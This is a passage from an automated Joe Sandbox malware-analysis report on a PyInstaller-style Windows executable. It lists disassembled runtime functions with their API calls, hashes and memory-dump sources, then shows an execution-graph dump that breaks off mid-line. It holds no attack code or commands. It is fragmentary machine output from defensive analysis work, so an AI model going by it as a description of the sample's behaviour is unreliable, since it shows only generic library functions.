                                                                                      • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                      • Instruction Fuzzy Hash: 5131E661619AC245EBA1AB60E4507AAF354EF84BE0F840231EE7D5F7C9DF3CD60187A0
                                                                                      Function 00007FF7F3DD2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                      • API String ID: 2030045667-255084403
                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                      • Instruction ID: 181d5bafc080ebaf6f977990e7ba27d40273d7dfe035b4a824d94cd3314f00fa
                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                      • Instruction Fuzzy Hash: F521F772B08B4181E750ABA4F8807EAB364FB88780F800135EE9D6B799DF3CD245C790
                                                                                      Function 00007FF7F3DEC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                      • String ID:
                                                                                      • API String ID: 2718003287-0
                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                      • Instruction ID: 775f15d9a27788961b64ada9be7e35c628ec14bbc8d5159decfb8c744f359ed0
                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                      • Instruction Fuzzy Hash: F5D13772B08A418AE754DFB5D4402AC7BB1FB547D8B804236DE6DABBC9DE38D046C390
                                                                                      Function 00007FF7F3DEF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_isindst
                                                                                      • String ID:
                                                                                      • API String ID: 4170891091-0
                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                      • Instruction ID: 5944f08a2ce7b60b00be7a8ce2f2eea3813531f22c2b260dae450e9a6408ce92
                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                      • Instruction Fuzzy Hash: 19515A72F0461186FB58EFA489512BCBB69BF40358F910335DD3E6AAE4DF38A442C790
                                                                                      Function 00007FF7F3DE577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                      • String ID:
                                                                                      • API String ID: 2780335769-0
                                                                                      • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                      • Instruction ID: 6e00a30a326d8c7af9a40158f2af195df77ab4b489ee80222aa1e68177a140d6
                                                                                      • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                      • Instruction Fuzzy Hash: 8751B562E0464986F794EFB0D4903BD7BA2AB48B98F504634DE1D6F7C9DF38D48083A1
                                                                                      Function 00007FF7F3DD20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                      • String ID:
                                                                                      • API String ID: 1956198572-0
                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                      • Instruction ID: 8dc9915a568aecbff456bd31e0ccc7e5903359a763709003c2c4f3c359694f84
                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                      • Instruction Fuzzy Hash: 40118621A1C54682F7D4A7F9F684279A351EB84784FC88030DE691BBDDCD2DD5D98250
                                                                                      Function 00007FF7F3DF5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                      • String ID: ?
                                                                                      • API String ID: 1286766494-1684325040
                                                                                      • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                      • Instruction ID: e631e8a3715736c6f5d76e77ee77043f82bce6492aff23112b9f03a0e201ed71
                                                                                      • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                      • Instruction Fuzzy Hash: 7F416C12A0828641FBA5ABB5E48137AE752EB80BA4F944234EE7D1FBDDDF3CD4418750
                                                                                      Function 00007FF7F3DE9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DE9046
                                                                                        • Part of subcall function 00007FF7F3DEA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F3DDCBA5), ref: 00007FF7F3DE9064
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                      • String ID: C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                      • API String ID: 3580290477-2540427151
                                                                                      • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                      • Instruction ID: 27b25f9dbd441c33745a9c0feb227a98c74d311c106aa003961c805ad241f776
                                                                                      • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                      • Instruction Fuzzy Hash: C341A336A0970285EB98FF61D8400BDABA4EF447D4BC54135E95E6BBC5CE3CD4C583A1
                                                                                      Function 00007FF7F3DECC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID: U
                                                                                      • API String ID: 442123175-4171548499
                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                      • Instruction ID: f4e0e9902a76f38140237504885feb8d14ae327b78fb0be1741b61b015dfc653
                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                      • Instruction Fuzzy Hash: CD41C572B18A4181DBA0AFA5E4443B9BBA0FB88BC4F804131EE5D9B798DF3CD441C790
                                                                                      Function 00007FF7F3DEF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID: :
                                                                                      • API String ID: 1611563598-336475711
                                                                                      • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                      • Instruction ID: b37029886734000a9d914611960cd5f5a2887ad9afd9775e9a0d01581942454c
                                                                                      • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                      • Instruction Fuzzy Hash: 20212D72A0868143FB64AB51D04427DB7B5FB84B44FC64139D6AD5B2C4CF7CD58487E2
                                                                                      Function 00007FF7F3DDFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                      • String ID: csm
                                                                                      • API String ID: 2573137834-1018135373
                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                      • Instruction ID: 51a07d2670193f30fdf77a6b3df9b0849c16a08b4fc514a6daec13f5d6cca019
                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                      • Instruction Fuzzy Hash: 2E116032609B8182EB619F25F440259B7E4FB88B98F584230DF9D1B798DF3CD551CB40
                                                                                      Function 00007FF7F3DF073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                      • String ID: :
                                                                                      • API String ID: 2595371189-336475711
                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                      • Instruction ID: 015f66b4f2a5ee5cba2f5e32fa5b8454245007a3e5960606f7366a6863bcd1fe
                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                      • Instruction Fuzzy Hash: 0501F76191C20381F7A4BFB0A4A127EA7A0EF44744FC00135D57D6B2C9DF3CD5448BA4

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:760
                                                                                      Total number of Limit Nodes:12
                                                                                      execution_graph 22853 7ffe126c30a9 abort 22822 7ff7f3de5410 76 API calls __free_lconv_num 22823 7ff7f3dfabe3 LeaveCriticalSection _fread_nolock 22855 7ff7f3dd4ee6 MultiByteToWideChar MultiByteToWideChar 21820 7ff7f3dd2fe0 21821 7ff7f3dd2ff0 21820->21821 21822 7ff7f3dd3041 21821->21822 21823 7ff7f3dd302b 21821->21823 21825 7ff7f3dd3061 21822->21825 21836 7ff7f3dd3077 __std_exception_destroy 21822->21836 21896 7ff7f3dd2710 54 API calls _log10_special 21823->21896 21897 7ff7f3dd2710 54 API calls _log10_special 21825->21897 21827 7ff7f3ddc550 _log10_special 8 API calls 21829 7ff7f3dd31fa 21827->21829 21828 7ff7f3dd3037 __std_exception_destroy 21828->21827 21831 7ff7f3dd3349 21902 7ff7f3dd2710 54 API calls _log10_special 21831->21902 21834 7ff7f3dd3333 21901 7ff7f3dd2710 54 API calls _log10_special 21834->21901 21836->21828 21836->21831 21836->21834 21837 7ff7f3dd330d 21836->21837 21840 7ff7f3dd3207 21836->21840 21848 7ff7f3dd1470 21836->21848 21878 7ff7f3dd1c80 21836->21878 21900 7ff7f3dd2710 54 API calls _log10_special 21837->21900 21839 7ff7f3dd3273 21842 7ff7f3dd3290 21839->21842 21843 7ff7f3dd329e 21839->21843 21840->21839 21898 7ff7f3dea404 37 API calls 2 library calls 21840->21898 21899 7ff7f3dea404 37 API calls 2 library calls 21842->21899 21882 7ff7f3dd2dd0 21843->21882 21846 7ff7f3dd329c 21886 7ff7f3dd2500 21846->21886 21903 7ff7f3dd45c0 21848->21903 21851 7ff7f3dd149b 21943 7ff7f3dd2710 54 API calls _log10_special 21851->21943 21852 7ff7f3dd14bc 21913 7ff7f3de06d4 21852->21913 21855 7ff7f3dd14ab 21855->21836 21856 7ff7f3dd14d1 21857 7ff7f3dd14d5 21856->21857 21858 7ff7f3dd14f8 21856->21858 21944 7ff7f3de4f08 11 API calls _set_fmode 21857->21944 21861 7ff7f3dd1532 21858->21861 21862 7ff7f3dd1508 21858->21862 21860 7ff7f3dd14da 21945 7ff7f3dd2910 54 API calls _log10_special 21860->21945 21865 7ff7f3dd1538 21861->21865 21873 7ff7f3dd154b 21861->21873 21946 7ff7f3de4f08 11 API calls _set_fmode 21862->21946 21917 7ff7f3dd1210 21865->21917 21866 7ff7f3dd1510 21947 7ff7f3dd2910 54 API calls _log10_special 21866->21947 21870 7ff7f3dd14f3 __std_exception_destroy 21939 7ff7f3de004c 21870->21939 21871 7ff7f3dd15c4 21871->21836 21873->21870 21874 7ff7f3dd15d6 21873->21874 21948 7ff7f3de039c 21873->21948 21951 7ff7f3de4f08 11 API calls _set_fmode 21874->21951 21876 7ff7f3dd15db 21952 7ff7f3dd2910 54 API calls _log10_special 21876->21952 21879 7ff7f3dd1ca5 21878->21879 22193 7ff7f3de4984 21879->22193 21885 7ff7f3dd2e04 21882->21885 21883 7ff7f3dd2f6f 21883->21846 21885->21883 22216 7ff7f3dea404 37 API calls 2 library calls 21885->22216 21887 7ff7f3dd252c 21886->21887 21888 7ff7f3dd2536 21886->21888 21889 7ff7f3dd9390 2 API calls 21887->21889 21890 7ff7f3dd254b 21888->21890 21891 7ff7f3dd9390 2 API calls 21888->21891 21889->21888 21892 7ff7f3dd2560 21890->21892 21894 7ff7f3dd9390 2 API calls 21890->21894 21891->21890 22217 7ff7f3dd2390 21892->22217 21894->21892 21895 7ff7f3dd257c __std_exception_destroy 21895->21828 21896->21828 21897->21828 21898->21839 21899->21846 21900->21828 21901->21828 21902->21828 21904 7ff7f3dd45cc 21903->21904 21953 7ff7f3dd9390 21904->21953 21906 7ff7f3dd45f4 21907 7ff7f3dd9390 2 API calls 21906->21907 21908 7ff7f3dd4607 21907->21908 21958 7ff7f3de5f94 21908->21958 21911 7ff7f3ddc550 _log10_special 8 API calls 21912 7ff7f3dd1493 21911->21912 21912->21851 21912->21852 21914 7ff7f3de0704 21913->21914 22126 7ff7f3de0464 21914->22126 21916 7ff7f3de071d 21916->21856 21918 7ff7f3dd1268 21917->21918 21919 7ff7f3dd126f 21918->21919 21920 7ff7f3dd1297 21918->21920 22143 7ff7f3dd2710 54 API calls _log10_special 21919->22143 21923 7ff7f3dd12d4 21920->21923 21924 7ff7f3dd12b1 21920->21924 21922 7ff7f3dd1282 21922->21870 21928 7ff7f3dd12e6 21923->21928 21937 7ff7f3dd1309 memcpy_s 21923->21937 22144 7ff7f3de4f08 11 API calls _set_fmode 21924->22144 21926 7ff7f3dd12b6 22145 7ff7f3dd2910 54 API calls _log10_special 21926->22145 22146 7ff7f3de4f08 11 API calls _set_fmode 21928->22146 21930 7ff7f3dd12eb 22147 7ff7f3dd2910 54 API calls _log10_special 21930->22147 21931 7ff7f3de039c _fread_nolock 53 API calls 21931->21937 21933 7ff7f3dd12cf __std_exception_destroy 21933->21870 21934 7ff7f3dd13cf 22148 7ff7f3dd2710 54 API calls _log10_special 21934->22148 21937->21931 21937->21933 21937->21934 21938 7ff7f3de0110 37 API calls 21937->21938 22139 7ff7f3de0adc 21937->22139 21938->21937 21940 7ff7f3de007c 21939->21940 22165 7ff7f3ddfe28 21940->22165 21942 7ff7f3de0095 21942->21871 21943->21855 21944->21860 21945->21870 21946->21866 21947->21870 22177 7ff7f3de03bc 21948->22177 21951->21876 21952->21870 21954 7ff7f3dd93b2 MultiByteToWideChar 21953->21954 21955 7ff7f3dd93d6 21953->21955 21954->21955 21957 7ff7f3dd93ec __std_exception_destroy 21954->21957 21956 7ff7f3dd93f3 MultiByteToWideChar 21955->21956 21955->21957 21956->21957 21957->21906 21959 7ff7f3de5ec8 21958->21959 21960 7ff7f3de5eee 21959->21960 21963 7ff7f3de5f21 21959->21963 21989 7ff7f3de4f08 11 API calls _set_fmode 21960->21989 21962 7ff7f3de5ef3 21990 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 21962->21990 21965 7ff7f3de5f34 21963->21965 21966 7ff7f3de5f27 21963->21966 21977 7ff7f3deac28 21965->21977 21991 7ff7f3de4f08 11 API calls _set_fmode 21966->21991 21967 7ff7f3dd4616 21967->21911 21971 7ff7f3de5f55 21984 7ff7f3defecc 21971->21984 21972 7ff7f3de5f48 21992 7ff7f3de4f08 11 API calls _set_fmode 21972->21992 21975 7ff7f3de5f68 21993 7ff7f3de5478 LeaveCriticalSection 21975->21993 21994 7ff7f3df02d8 EnterCriticalSection 21977->21994 21979 7ff7f3deac3f 21980 7ff7f3deac9c 19 API calls 21979->21980 21981 7ff7f3deac4a 21980->21981 21982 7ff7f3df0338 _isindst LeaveCriticalSection 21981->21982 21983 7ff7f3de5f3e 21982->21983 21983->21971 21983->21972 21995 7ff7f3defbc8 21984->21995 21987 7ff7f3deff26 21987->21975 21989->21962 21990->21967 21991->21967 21992->21967 21996 7ff7f3defc03 __vcrt_InitializeCriticalSectionEx 21995->21996 22005 7ff7f3defdca 21996->22005 22010 7ff7f3de7a3c 51 API calls 3 library calls 21996->22010 21998 7ff7f3defea1 22014 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 21998->22014 22000 7ff7f3defdd3 22000->21987 22007 7ff7f3df6d54 22000->22007 22002 7ff7f3defe35 22002->22005 22011 7ff7f3de7a3c 51 API calls 3 library calls 22002->22011 22004 7ff7f3defe54 22004->22005 22012 7ff7f3de7a3c 51 API calls 3 library calls 22004->22012 22005->22000 22013 7ff7f3de4f08 11 API calls _set_fmode 22005->22013 22015 7ff7f3df6354 22007->22015 22010->22002 22011->22004 22012->22005 22013->21998 22014->22000 22016 7ff7f3df636b 22015->22016 22020 7ff7f3df6389 22015->22020 22069 7ff7f3de4f08 11 API calls _set_fmode 22016->22069 22018 7ff7f3df6370 22070 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 22018->22070 22019 7ff7f3df63a5 22026 7ff7f3df6964 22019->22026 22020->22016 22020->22019 22024 7ff7f3df637c 22024->21987 22072 7ff7f3df6698 22026->22072 22029 7ff7f3df69f1 22092 7ff7f3de8520 22029->22092 22030 7ff7f3df69d9 22104 7ff7f3de4ee8 11 API calls _set_fmode 22030->22104 22034 7ff7f3df69de 22105 7ff7f3de4f08 11 API calls _set_fmode 22034->22105 22062 7ff7f3df63d0 22062->22024 22071 7ff7f3de84f8 LeaveCriticalSection 22062->22071 22069->22018 22070->22024 22073 7ff7f3df66c4 22072->22073 22080 7ff7f3df66de 22072->22080 22073->22080 22117 7ff7f3de4f08 11 API calls _set_fmode 22073->22117 22075 7ff7f3df66d3 22118 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 22075->22118 22077 7ff7f3df67ad 22090 7ff7f3df680a 22077->22090 22123 7ff7f3de9b78 37 API calls 2 library calls 22077->22123 22078 7ff7f3df675c 22078->22077 22121 7ff7f3de4f08 11 API calls _set_fmode 22078->22121 22080->22078 22119 7ff7f3de4f08 11 API calls _set_fmode 22080->22119 22082 7ff7f3df6806 22085 7ff7f3df6888 22082->22085 22082->22090 22084 7ff7f3df67a2 22122 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 22084->22122 22124 